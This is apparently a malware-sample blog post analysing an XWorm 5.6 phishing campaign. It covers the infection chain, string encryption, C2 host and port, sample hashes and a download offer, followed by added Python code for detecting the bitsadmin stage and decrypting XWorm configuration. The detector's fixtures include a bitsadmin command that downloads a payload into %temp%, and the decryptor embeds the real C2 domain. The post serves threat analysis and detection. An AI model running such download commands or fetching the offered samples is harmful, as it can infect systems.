2024-09-12 0day in {REA_TEAM}: The X-Worm malware is being spread through a phishing email
by m4n0w4r

More about X-Worm: Malpedia: X-Worm Malware with a wide range of capabilities ranging from RAT to ransomware.

Phishing Tactics: An attacker sent an email with a shortened link that, when clicked, triggered the download of a file named Itinerary.doc_.zip. The downloaded .zip file contained a shortcut file (.lnk). This .lnk file was used to download and run a malicious batch script (output4.bat), which employed bitsadmin to download a harmful payload, disguised as svchost.com, into the %temp% folder.

The svchost.com file was analyzed using tools like DiE and ExeInfo, revealing it to be part of the XWorm malware family, protected by .NET Reactor. The malware's code was heavily obfuscated but was partially deobfuscated using the NETReactorSlayer tool. String decryption relies on MD5 hashing, AES encryption in ECB mode, and Base64 decoding. The malware's configuration included a host (cyberdon1[.]duckdns[.]org), port (1500), and other parameters like a Telegram token and chat ID.

XWorm Version: The analyzed version of XWorm was 5.6.

Download. Email me if you need the password scheme.

File Information
├── 1893afc228afedb18b743176cbd3f0e4adb31fee7982252a4dc6180a6fb83451 ZBWWHQNZII.exe
├── ec7351c49098d55c332f9c5b0b4c51ffe804dd5780fc954006efcf2aeef91b7f HPFQJGRKIS.exe
├── ec7e0bf7036f03786789b6cb58d01c84733fc3a865974c79edf68cba25ff9891.Itinerary.doc.zip.exe
└── ec7e0bf7036f03786789b6cb58d01c84733fc3a865974c79edf68cba25ff9891 ZBWWHQNZII.exe

Malware Repo Links
Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.
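The delivery chain above (shortcut, batch script, bitsadmin pulling a payload named svchost.com into %temp%) leaves a recognisable trace in process-creation telemetry. The following is an added example, not code from the REA_TEAM write-up or from contagio, that flags that bitsadmin stage over a handful of constructed event records; it generalises slightly beyond the post by also treating other system-binary names and legacy executable extensions as masquerading. The field names, the event records and the placeholder.invalid URL are all constructed.

```python
import re

# Constructed process-creation records (not real telemetry), trimmed to the
# fields the check needs: image, parent image and command line.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\Itinerary.doc_\output4.bat"'},
    # The stage the post describes: bitsadmin dropping svchost.com into %temp%
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high "
                r"http://placeholder.invalid/payload %temp%\svchost.com"},
    # Query-only bitsadmin use: no transfer, nothing to flag
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"bitsadmin /list /allusers"},
    # A transfer into a vendor directory under an ordinary installer name
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer update /download "
                r"http://placeholder.invalid/update.msi C:\ProgramData\Vendor\update.msi"},
]

TEMP_DIR_RE = re.compile(r"%temp%|%tmp%|\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Names of well-known Windows binaries; a download landing under one of these
# stems is the masquerading the post describes (svchost.com).
SYSTEM_BINARY_STEMS = {"svchost", "csrss", "lsass", "winlogon", "services",
                       "explorer", "rundll32", "conhost"}
LEGACY_EXEC_EXTS = {"com", "scr", "pif"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # keeps quoted paths as one token


def bitsadmin_transfer_target(cmdline):
    """Destination path of a `bitsadmin /transfer` command line, else None."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    if not tokens or "bitsadmin" not in tokens[0].lower():
        return None
    if not any(t.lower() == "/transfer" for t in tokens):
        return None
    # bitsadmin /transfer takes the local destination as its last argument
    return tokens[-1]


def classify(event):
    """Reasons the event matches the pattern; an empty list means no match."""
    target = bitsadmin_transfer_target(event.get("cmdline", ""))
    if target is None:
        return []
    reasons = []
    name = target.replace("\\", "/").rsplit("/", 1)[-1]
    stem, _, ext = name.lower().rpartition(".")
    if TEMP_DIR_RE.search(target):
        reasons.append("BITS download lands in the user temp directory")
    if stem in SYSTEM_BINARY_STEMS:
        reasons.append(f"destination name '{name}' mimics a Windows system binary")
    if ext in LEGACY_EXEC_EXTS:
        reasons.append(f"destination uses legacy executable extension .{ext}")
    # Parent context is only worth reporting once the target itself looks wrong
    if reasons and event.get("parent_image", "").lower().endswith("\\cmd.exe"):
        reasons.append("spawned by cmd.exe, consistent with the batch-script stage")
    return reasons


def scan(events):
    """(index, reasons) for every event that matches."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline']}")
        for reason in reasons:
            print("  -", reason)
```

Only the second record is reported, with four reasons; the query-only and vendor-directory invocations pass, which is the point of keying on the destination rather than on bitsadmin.exe itself.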
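The summary names the string-decryption scheme (MD5 hashing, AES in ECB mode, Base64 decoding) without showing it. The block below is an added example, not the malware's code and not from the REA_TEAM or contagio write-ups, of the analyst-side routine for recovering such settings. It assumes the `cryptography` package is installed, and its key expansion (the 16-byte MD5 digest of the key string copied to offsets 0 and 15 of a 32-byte AES-256 key) is an assumption taken from public XWorm analyses rather than something this post states. The key string and the encrypted fixtures are constructed; the plaintext host and port are the values the post reports.

```python
import base64
import hashlib

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


def derive_key(key_string):
    """32-byte AES key from MD5(key_string): digest at offset 0 and again at 15.

    Assumed layout (from public XWorm write-ups, not from this post); the two
    copies overlap by one byte and key[31] stays zero.
    """
    digest = hashlib.md5(key_string.encode("utf-8")).digest()
    key = bytearray(32)
    key[0:16] = digest
    key[15:31] = digest
    return bytes(key)


def decrypt_setting(b64_blob, key_string):
    """Base64 -> AES-256-ECB decrypt -> strip PKCS#7 padding -> UTF-8 text."""
    ciphertext = base64.b64decode(b64_blob)
    decryptor = Cipher(algorithms.AES(derive_key(key_string)), modes.ECB()).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode("utf-8")


def encrypt_setting(text, key_string):
    """Inverse of decrypt_setting; used here only to build constructed fixtures."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(text.encode("utf-8")) + padder.finalize()
    encryptor = Cipher(algorithms.AES(derive_key(key_string)), modes.ECB()).encryptor()
    return base64.b64encode(encryptor.update(padded) + encryptor.finalize()).decode("ascii")


def decode_config(encrypted_settings, key_string):
    """Decrypt every field of an encrypted settings dict."""
    return {name: decrypt_setting(blob, key_string)
            for name, blob in encrypted_settings.items()}


def find_key(b64_blob, candidate_keys):
    """First candidate key string that yields clean, printable text, else None.

    A wrong key fails PKCS#7 unpadding or UTF-8 decoding almost always, so
    this is a cheap way to test a few suspected key strings pulled from a sample.
    """
    for candidate in candidate_keys:
        try:
            if decrypt_setting(b64_blob, candidate).isprintable():
                return candidate
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def defang(host):
    """Render a recovered host safely for a report."""
    return host.replace(".", "[.]")


# Constructed fixture: the host and port the post reports, encrypted under a
# placeholder key string the way a sample's settings would be stored.
CONSTRUCTED_KEY = "EXAMPLE-KEY-PLACEHOLDER"
CONSTRUCTED_SETTINGS = {
    "Host": encrypt_setting("cyberdon1.duckdns.org", CONSTRUCTED_KEY),
    "Port": encrypt_setting("1500", CONSTRUCTED_KEY),
}

if __name__ == "__main__":
    config = decode_config(CONSTRUCTED_SETTINGS, CONSTRUCTED_KEY)
    print("Host:", defang(config["Host"]), "Port:", config["Port"])
```

Because ECB has no IV, identical plaintext fields encrypt to identical blobs under the same key, which is why a config extractor can match repeated Base64 strings across samples before it has recovered the key at all.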
Article Link: contagio: 2024-09-19 X-WORM RAT (Phishing) Samples